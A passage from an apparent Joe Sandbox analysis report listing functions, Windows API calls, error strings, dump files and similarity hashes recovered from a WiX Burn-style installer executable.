GetLastError.KERNEL32(?,?,?,?,?,?,?,00CAEFAB), ref: 00CAEE40

Strings

Failed to stop wusa service., xrefs: 00CAEE6F
msuengine.cpp, xrefs: 00CAEE65

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuengine.cpp
API String ID: 4114567744-2259829683
Opcode ID: 080ee36ca374279665010ba83c2e99f10f60bb07af6fdb9750b1762a3747e403
Instruction ID: 05a8a6fb1ee55bf1eb747e5c873e68ee1e09a3836a077a02f808c7ddf4a98001
Opcode Fuzzy Hash: 080ee36ca374279665010ba83c2e99f10f60bb07af6fdb9750b1762a3747e403
Instruction Fuzzy Hash: 34F0F932B40225A7D7219AA5DC06FAF77A89F04B10F01002DF915EB180DB64DD0492D5

Function 00CA296A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 00CA2993
GetLastError.KERNEL32 ref: 00CA299D

Strings

Failed to post elevate message., xrefs: 00CA29CC
EngineForApplication.cpp, xrefs: 00CA29C2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 12c5762f6e64e2f023521171076195d972889f9fc7eda2853192997a365c8458
Instruction ID: 0f5d66d2f0b6cb3842282f226204f57a0e75ea9283504c7589dc968969f4c1a5
Opcode Fuzzy Hash: 12c5762f6e64e2f023521171076195d972889f9fc7eda2853192997a365c8458
Instruction Fuzzy Hash: 5FF0C232390236AFD2202AA8DC0AF577754AB06B31F154139FA24AF2D1EA25CC4197C4

Function 00C9BB6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 00C9BB96
FreeLibrary.KERNEL32(?,?,00C918A2,?,?,?,?,00C91E12,?), ref: 00C9BBA5
GetLastError.KERNEL32(?,00C918A2,?,?,?,?,00C91E12,?), ref: 00C9BBAF

Strings

BootstrapperApplicationDestroy, xrefs: 00C9BB90

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: 5a5a3cc77229ca327a879a88d0c47c25499fb6c2049483a7c3866c4e74217bc0
Instruction ID: ffd358e8e62cea5f70a68fc4c3297acca51db7e30f19497032acb47a4aeb5971
Opcode Fuzzy Hash: 5a5a3cc77229ca327a879a88d0c47c25499fb6c2049483a7c3866c4e74217bc0
Instruction Fuzzy Hash: EEF04431300301ABDB209FA6ED09F2777ECAF80762B084429E565C7554D725ED0087A0

Function 00CC54BC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00CC54D1
SysFreeString.OLEAUT32(00000000), ref: 00CC5503

Strings

xmlutil.cpp, xrefs: 00CC54E5
`<u, xrefs: 00CC5503

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: `<u$xmlutil.cpp
API String ID: 344208780-3482516102
Opcode ID: 50a2158d45977f5b5fd7c2b19339a497c42a1ccbecd605fb69fabf6c1eed25d1
Instruction ID: 09bcc85774a9c2b330b408143394846671d272f9d460ab7daedad0e200d3aa0a
Opcode Fuzzy Hash: 50a2158d45977f5b5fd7c2b19339a497c42a1ccbecd605fb69fabf6c1eed25d1
Instruction Fuzzy Hash: 1AF0B431600B58E7CB214E54DC08F6B77AAAF80B61F25012CFC159B220C7B4DD909BD0

Function 00CC55B3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00CC55C8
SysFreeString.OLEAUT32(00000000), ref: 00CC55FA

Strings

xmlutil.cpp, xrefs: 00CC55DF
`<u, xrefs: 00CC55FA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: `<u$xmlutil.cpp
API String ID: 344208780-3482516102
Opcode ID: 348a58e888019f0f95037261c3427e8d8111e180fbfb198939af7fe6ff3d06ef
Instruction ID: 81e1301965a4245925492e02aa0ab1756ac9f07b35299402a48f81985e8ad94c
Opcode Fuzzy Hash: 348a58e888019f0f95037261c3427e8d8111e180fbfb198939af7fe6ff3d06ef
Instruction Fuzzy Hash: 4FF0BE32240B58A7CB210E99DC08F5A77A8EF84B61F55412DFC14DB320DBB8ED819B98

Function 00CA28A8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,00000000), ref: 00CA28BB
GetLastError.KERNEL32 ref: 00CA28C5

Strings

EngineForApplication.cpp, xrefs: 00CA28EA
Failed to post detect message., xrefs: 00CA28F4

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 4be2ba045ec5715f8de5830e1e5f9e05d95c785a6e24965917a46d1546d6376f
Instruction ID: 6b9fabbab234b2053cf1ef50bd5a2edc19b5b160f2e7e92d4a0dfeb9caa830a8
Opcode Fuzzy Hash: 4be2ba045ec5715f8de5830e1e5f9e05d95c785a6e24965917a46d1546d6376f
Instruction Fuzzy Hash: 4FF03733645636AA922015D99C0AF977E589F01B71F110139FA18DA191DA59DD40D2D8

Function 00CA29E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 00CA29F5
GetLastError.KERNEL32 ref: 00CA29FF

Strings

EngineForApplication.cpp, xrefs: 00CA2A24
Failed to post apply message., xrefs: 00CA2A2E

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: 9dcea8db8b4b59064d08517e1fd82ee81e6173da6c702bb25daa1a1bdd9d13b5
Instruction ID: 4a6bb5bd32c85f7f62b6f4ab5dbc66fd776d78ed6ef663aea676c5340e2a8ef0
Opcode Fuzzy Hash: 9dcea8db8b4b59064d08517e1fd82ee81e6173da6c702bb25daa1a1bdd9d13b5
Instruction Fuzzy Hash: 5FF0A732680336AAD2301A99DC0AF8B7F58DF01B71B014029F918EA191DB24DD00A7D4

Function 00CA2908 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 00CA291D
GetLastError.KERNEL32 ref: 00CA2927

Strings

EngineForApplication.cpp, xrefs: 00CA294C
Failed to post plan message., xrefs: 00CA2956

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: 4938880312e5ee9853fd60150a7741c0ab2f8918848e168e457188a0b12772e8
Instruction ID: 07dee1bb52a974882d8714a5a831ab99876b0db6e6fb8528fb207b17be07a091
Opcode Fuzzy Hash: 4938880312e5ee9853fd60150a7741c0ab2f8918848e168e457188a0b12772e8
Instruction Fuzzy Hash: EAF0A732640336ABD6201AA9DC1AF8B7F98EF01FB1F010029FA18EA191DA25CD0092D4

Function 00CA2A42 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009004,?,00000000), ref: 00CA2A57
GetLastError.KERNEL32 ref: 00CA2A61

Strings

Failed to post shutdown message., xrefs: 00CA2A90
EngineForApplication.cpp, xrefs: 00CA2A86

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: 745bc87277b7c9e735a3122bb5fb3230b2b42880204d58b8ef84c1655b303ee4
Instruction ID: 587ac0e72fc7779e670b059ced19ef1ad8d65712d460a63ec93e870f58317b29
Opcode Fuzzy Hash: 745bc87277b7c9e735a3122bb5fb3230b2b42880204d58b8ef84c1655b303ee4
Instruction Fuzzy Hash: D3F0A732741637BA93302AD9DC0AF9B7F58AF01B71F010029FA14DA191EA24DD00A7D4

Function 00CB64FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(526A5680,00C91D56,00CB6782,00C91D56,?,00CB06B4,00C9222A,00C91E8E,?,00C9D8FA,?,00C91D56,00C91D9E,?,00C91DDE,WixBundleElevated), ref: 00CB6503
GetLastError.KERNEL32(?,00CB06B4,00C9222A,00C91E8E,?,00C9D8FA,?,00C91D56,00C91D9E,?,00C91DDE,WixBundleElevated,00000000,00000000,00000001,00C91DDE), ref: 00CB650D

Strings

Failed to set begin operation event., xrefs: 00CB653C
cabextract.cpp, xrefs: 00CB6532

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: 68d90ad1e5aae2ed8878f8b2c2d34615165675a3f74759e6b2e947760b62185d
Instruction ID: 88a07708b167c8fa5ded4fbed3c9f6905d8c07245b19c573f5471eef88d1ff5a
Opcode Fuzzy Hash: 68d90ad1e5aae2ed8878f8b2c2d34615165675a3f74759e6b2e947760b62185d
Instruction Fuzzy Hash: CBE02272744232AA923022A8ED0BFDA2A98AF00B61F06023DF901E7291EA0CCC1463D4

Function 00CBEDFE Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CBEE32
__isleadbyte_l.LIBCMT ref: 00CBEE65
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00CBEE96
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?,?,?,00000000), ref: 00CBEF04

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: cb34249941a273284cb7ba5c327cbe620db36b6af3f8638bdf15d802f0aabc97
Instruction ID: 06b94b300a7d3ba4403c052470d8cae9add664af5eb9887b05f559ce6158d766
Opcode Fuzzy Hash: cb34249941a273284cb7ba5c327cbe620db36b6af3f8638bdf15d802f0aabc97
Instruction Fuzzy Hash: 5C31AF31A00296EFDB20DFA4C881AFE7BB5EF01711F1889A9F4659B1A1D731DE40DB51

Function 00C91226 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C9587B: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,?,?,?,00C91245,?,?,00000000), ref: 00C958CB

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00C912AC

Strings

Failed to get current process path., xrefs: 00C91262
Unable to get resume command line from the registry, xrefs: 00C9124B
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00C91296

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: 5ac546628a2a815ec951c0a796ec5a6c1a29f47891815bc43c5b16c10e899472
Instruction ID: f574021aad4c1772e1aacbf908f9b34e6368c9cc92645f340739317e0bc629d2
Opcode Fuzzy Hash: 5ac546628a2a815ec951c0a796ec5a6c1a29f47891815bc43c5b16c10e899472
Instruction Fuzzy Hash: E3114F72D00919FACF12BB95D84ADEDFBB9EF50750B25816AF811B2150E7315F41AB40

Function 00C9A4AA Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C9A4B8
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00C9A51A

Strings

Failed to get value as numeric for variable: %ls, xrefs: 00C9A50B
Failed to get value of variable: %ls, xrefs: 00C9A4EF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-4270472870
Opcode ID: c859396527307418b4ac37f16e52a66b226716c53b02b0128fcf9c53c06be55f
Instruction ID: da7c5d3c041382cf085bd9f1076e4a27caf5ef39829e331b2022030bd6773668
Opcode Fuzzy Hash: c859396527307418b4ac37f16e52a66b226716c53b02b0128fcf9c53c06be55f
Instruction Fuzzy Hash: B801F272A40228FBCF215B94CC0DF9E7B18EB00369F219125FD14A6201C379EF0097E6

Function 00C9A5A6 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C9A5B4
LeaveCriticalSection.KERNEL32(?,?,00000000), ref: 00C9A616

Strings

Failed to get value as version for variable: %ls, xrefs: 00C9A607
Failed to get value of variable: %ls, xrefs: 00C9A5EB

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-1851729331
Opcode ID: e455780e41d0da023eb8bec0986683402ffe13f6ae5ec3a48aa52316899f9298
Instruction ID: cff56cd66c67bd8b8054fc71f6d91561bd293d110d48711ee1f8138d7f3f5422
Opcode Fuzzy Hash: e455780e41d0da023eb8bec0986683402ffe13f6ae5ec3a48aa52316899f9298
Instruction Fuzzy Hash: 6B0184B2A00529EFCF215B94CC4DF8E7B68AB04725F154121FD15A6211C739DE0097E6

Function 00C9A528 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,00CA9714,?,WixBundleOriginalSource,?,00000000,?,?,00000001,?,?,00000001), ref: 00C9A536
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,00CA9714,?,WixBundleOriginalSource,?,00000000,?,?,00000001,?,?,00000001), ref: 00C9A598

Strings

Failed to get value as string for variable: %ls, xrefs: 00C9A589
Failed to get value of variable: %ls, xrefs: 00C9A56D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2100416246
Opcode ID: 6965bfc34b2e58412430f34a67fb8544c025cc93ef3d5f6ae07334cd87f26249
Instruction ID: dde01bb3f8934cd20449e2c16185a361dfe9fd6ea4aea93da040e29e6f3500ad
Opcode Fuzzy Hash: 6965bfc34b2e58412430f34a67fb8544c025cc93ef3d5f6ae07334cd87f26249
Instruction Fuzzy Hash: 73018472A40628ABCF225BD8CC4DF9E7B68AB04725F124121FD15AA211C339DE0096E6

Function 00CB9A29 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00CB83E6), ref: 00CB9A2C
__malloc_crt.LIBCMT ref: 00CB9A5B
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CB9A68

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 25f8ca7229ca6dd1462eff812d48369c6d55d630708c8d8e9ae82e34f6ddcb3b
Instruction ID: d30dde86a0912e4bbe4615310c3b29c10cf1222ccb4e7c11ce53172312379414
Opcode Fuzzy Hash: 25f8ca7229ca6dd1462eff812d48369c6d55d630708c8d8e9ae82e34f6ddcb3b
Instruction Fuzzy Hash: 0FF027375081105BCB307774FC468EB6B2CCBD1360B1A4017F512C3200FE308F45A2A1

Function 00CB8E5C Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00CB8E76

Part of subcall function 00CBBB40: __FF_MSGBANNER.LIBCMT ref: 00CBBB59
Part of subcall function 00CBBB40: __NMSG_WRITE.LIBCMT ref: 00CBBB60
Part of subcall function 00CBBB40: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00CBC5F7,00000000,00000001,00000000,?,00CBBDA6,00000018,00CE34C0,0000000C,00CBBE36), ref: 00CBBB85

std::exception::exception.LIBCMT ref: 00CB8EAB
std::exception::exception.LIBCMT ref: 00CB8EC5
__CxxThrowException@8.LIBCMT ref: 00CB8ED6

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: std::exception::exception$AllocException@8HeapThrow_malloc
String ID:
API String ID: 1414122017-0
Opcode ID: 6b658cfc950d09499a6d3449c979b3b71c2b97ce8fc9a6a270d68c0c8260e0e9
Instruction ID: 148094258397de36b837843ab410576b54701ce63e57982847ed8fc1aceba3e2
Opcode Fuzzy Hash: 6b658cfc950d09499a6d3449c979b3b71c2b97ce8fc9a6a270d68c0c8260e0e9
Instruction Fuzzy Hash: BFF0F435904289ABCF00EB65EC16FED7AA8AB01314F440129F510961A1CFF0CF06D640

Function 00C9A624 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00CA6FFF,?,?,?,?,?,?,00CA74EE,?,?,?), ref: 00C9A632
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00CA6FFF,?,?,?,?,?,?,00CA74EE,?,?,?), ref: 00C9A683

Strings

Failed to copy value of variable: %ls, xrefs: 00C9A674
Failed to get value of variable: %ls, xrefs: 00C9A655

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 0aed755eff1afe054ed7c55384c6fd4475426b7520731983bd68455ecf351d2c
Instruction ID: c8fd63678dfa494b42328b64996b8b9e3b245fc3277cb16f7b4d99ebc5da118a
Opcode Fuzzy Hash: 0aed755eff1afe054ed7c55384c6fd4475426b7520731983bd68455ecf351d2c
Instruction Fuzzy Hash: 6CF04F76940228BBCF116BE8DC5AF8E7B6CEB04761F198111FD15A6211C235EE1096E5

Function 00CC3FDE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000), ref: 00CC4144

